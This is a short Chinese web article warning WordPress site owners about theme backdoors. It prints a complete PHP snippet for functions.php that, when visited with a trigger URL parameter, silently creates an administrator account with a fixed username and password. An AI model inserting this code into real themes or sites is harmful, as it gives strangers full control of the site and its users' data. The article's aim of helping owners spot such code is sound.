大家好，今小编要介绍的是关于防范wordpress主题加后门代码获取管理员权限的相关内容，多方面分析说明，感兴趣朋友的可以参考学习。

关键词：wordpress主题   后门代码   获取管理员权限  

复制代码代码如下:
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

简单说明下，代码主要放于functions.php文件里面，不会影响任何功能使用，如果存在此代码，任何人只要运行http://www.你的域名.com/?backdoor=go，然后就创建了一个用户名为“backdoor”，密码为：“pa55w0rd!” 的管理员。同样具备管理员的权限，很编辑主题代码文件，相信此时你一定感觉到很危险了吧，赶紧检查检查自己的主题代码吧……

以上就是防范wordpress主题加后门代码获取管理员权限的全部内容，希望可以帮助到您。感谢对蚂蚁资源网的支持。
（责任编辑：金镀我）

版权声明：文章内容是蚂蚁资源网小编精心整合原创的，素材来源于互联网，如无意侵犯到您的权益，请联系网站客服核实版权信息，以便及时删除。